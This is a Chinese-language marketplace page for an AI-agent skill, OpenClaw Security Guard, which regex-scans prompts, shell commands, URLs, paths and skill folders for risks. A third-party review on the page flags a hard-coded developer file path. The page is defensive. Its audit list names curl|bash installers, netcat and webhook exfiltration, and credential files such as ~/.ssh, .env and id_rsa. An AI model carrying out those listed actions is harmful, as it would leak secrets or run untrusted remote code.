← 返回 Skills 市场
274
总下载
0
收藏
0
当前安装
3
版本数
在 OpenClaw 中安装
/install clawlite-openclaw-security-guard
功能描述
This skill should be used when the user asks to harden agent workflows, audit prompts/commands/URLs/paths, scan a third-party skill before install or publish...
使用说明 (SKILL.md)
OpenClaw Security Guard
Use this skill to run fast local security checks before trusting or publishing automation.
What this skill is for
Run this skill when you need to:
- scan suspicious text for prompt injection / secret leakage patterns
- validate shell commands before automation or publishing
- validate URLs for SSRF / localhost / metadata access risks
- validate file paths for traversal / sensitive file access
- audit a skill folder for dangerous scripts, hardcoded secrets, exfiltration patterns, or unsafe install/publish flows
- add a lightweight self-defense layer before using external skills
Workflow
- Choose the narrowest check needed.
- Run one of the bundled scripts.
- Treat
BLOCKas stop-work until reviewed. - Treat
WARNas requiring human review or a narrower sandbox. - For skill audits, review the flagged file lines before install/publish.
Bundled scripts
1) Quick text / command / URL / path checks
node {baseDir}/scripts/security-check.mjs text "\x3Ccontent>"
node {baseDir}/scripts/security-check.mjs command "\x3Cshell command>"
node {baseDir}/scripts/security-check.mjs url "\x3Curl>"
node {baseDir}/scripts/security-check.mjs path "\x3Cpath>"
2) Skill / folder audit
node {baseDir}/scripts/audit-skill-dir.mjs /absolute/or/relative/path/to/skill
3) Write audit into Obsidian vault
node {baseDir}/scripts/write-obsidian-audit.mjs /tmp/audit.json "Skill Audit - my-skill"
This writes a markdown audit note into the ClawLite Obsidian vault under Security Audits/.
4) Install lightweight local hook wrapper
bash {baseDir}/scripts/install-hooks.sh
This installs a reusable workspace script for prepublish checks.
This audits for:
- hardcoded secrets / tokens
- curl|bash / wget|sh installers
- destructive shell patterns
- risky exfiltration / webhook / netcat usage
- suspicious file targets like
~/.ssh,/etc/passwd,.env,id_rsa
Verdicts
ALLOW— no high-risk pattern found in this lightweight passWARN— review manually before proceedingBLOCK— do not trust / run / publish until reviewed
Important limits
- This is a lightweight guard, not a full sandbox.
- Regex-based detection catches common dangerous patterns, not all attacks.
- A clean result does not prove safety.
- For high-risk code, still prefer human review and runtime isolation.
Publishing / install guard
Before publishing or installing a skill from GitHub / ClawHub:
- run
audit-skill-dir.mjs - inspect every
WARN/BLOCK - only proceed when the remaining risk is understood
References
If you need the audit categories / philosophy, read:
{baseDir}/references/checklist.md
安全使用建议
This skill appears to implement a useful local pre-publish/audit tool, but review it locally before running: 1) Ensure you have Node available (scripts rely on node but the skill metadata doesn't declare it). 2) Inspect write-obsidian-audit.mjs — it writes to a hard-coded path (/Users/m1/...) that likely belongs to the author; change it or delete that behavior before running to avoid unexpected writes. 3) The install-hooks.sh will create a script in $HOME/.openclaw/workspace — accept only if you want that helper installed. 4) Because the audit script reads files under whatever path you supply, avoid pointing it at sensitive system directories unless you intend to allow reading those files. 5) Prefer running the scripts in an isolated environment (container or throwaway account) and manually inspect the code (especially file-write locations) before giving the skill filesystem access. If you want higher assurance, ask the author to remove hard-coded paths and to declare Node as a required runtime.
功能分析
Type: OpenClaw Skill
Name: clawlite-openclaw-security-guard
Version: 0.2.1
The skill provides a suite of local security auditing tools designed to scan code, shell commands, URLs, and file paths for common vulnerabilities, hardcoded secrets, and malicious patterns. The core logic in scripts like audit-skill-dir.mjs and security-check.mjs uses regex-based detection to identify risks such as prompt injection, SSRF, and data exfiltration in other files. The installation script (install-hooks.sh) sets up a local prepublish wrapper, and the overall behavior is transparent and strictly aligned with its stated purpose as a security guard for the OpenClaw environment.
能力评估
Purpose & Capability
The skill's name, description, and scripts align: it scans text/commands/URLs/paths and audits skill folders. One mismatch: the package includes Node and bash scripts but the registry metadata lists no required binaries; a legitimate skill should declare Node (and/or bash) as a dependency/runtime requirement.
Instruction Scope
SKILL.md and scripts instruct the agent to read arbitrary target directories (audit-skill-dir) and to write audit notes to disk. write-obsidian-audit.mjs uses a hard-coded vault path (/Users/m1/Desktop/obsidianvault/ClawLite) which is a leak of the packager's local path and will attempt to write to that exact location when run — unexpected and undesirable. The install-hooks.sh writes a helper script into $HOME/.openclaw/workspace which modifies the user's home workspace; this is documented but is an automatic filesystem modification that users should be warned about.
Install Mechanism
There is no remote download/install step; the skill ships its scripts in the package. That lowers supply-chain risk. The included install-hooks.sh does create a script in the user's $HOME which is a local change but not a remote installation.
Credentials
The skill does not request any environment variables or credentials (good). However, scripts write into $HOME and a hard-coded absolute path to an Obsidian vault; the latter is unrelated to the stated purpose and appears to be a leftover developer path. No secrets are requested, but the auditing scripts will read files under whatever target directory is provided (expected for an audit tool).
Persistence & Privilege
always:false (good). The only persistent change is install-hooks.sh which installs a helper script under $HOME/.openclaw/workspace — this is scope-limited to the user's workspace but it does modify the filesystem and create an executable helper. The skill does not attempt to modify other skills or global agent settings beyond that helper install.
如何使用
- 确保已安装 OpenClaw(本地或 Docker 部署)
- 在对话框中输入安装命令:
/install clawlite-openclaw-security-guard - 安装完成后,直接呼叫该 Skill 的名称或使用
/clawlite-openclaw-security-guard触发 - 根据 Skill 的参数说明提供必要输入,即可获得结构化输出
版本历史
v0.2.1
Align description with when-to-use trigger language and add keyword metadata.
v0.2.0
Add prepublish guard, Obsidian audit writer, and lightweight hook installer wrapper.
v0.1.0
Initial lightweight security guard for OpenClaw prompts, commands, URLs, paths, and skill-folder audits.
元数据
常见问题
OpenClaw Security Guard 是什么?
This skill should be used when the user asks to harden agent workflows, audit prompts/commands/URLs/paths, scan a third-party skill before install or publish... 它是一个面向 Claude Code / OpenClaw 的 AI Agent Skill 插件,目前累计下载 274 次。
如何安装 OpenClaw Security Guard?
在 OpenClaw 或 Claude Code 对话框中运行命令「/install clawlite-openclaw-security-guard」即可一键安装,无需额外配置。
OpenClaw Security Guard 是免费的吗?
是的,OpenClaw Security Guard 完全免费,采用 MIT-0 许可证,可自由下载、安装和使用。
OpenClaw Security Guard 支持哪些平台?
OpenClaw Security Guard 跨平台运行,可在任意部署了 OpenClaw / Claude Code 的环境中使用(cross-platform)。
谁开发了 OpenClaw Security Guard?
由 X-RayLuan(@x-rayluan)开发并维护,当前版本 v0.2.1。
推荐 Skills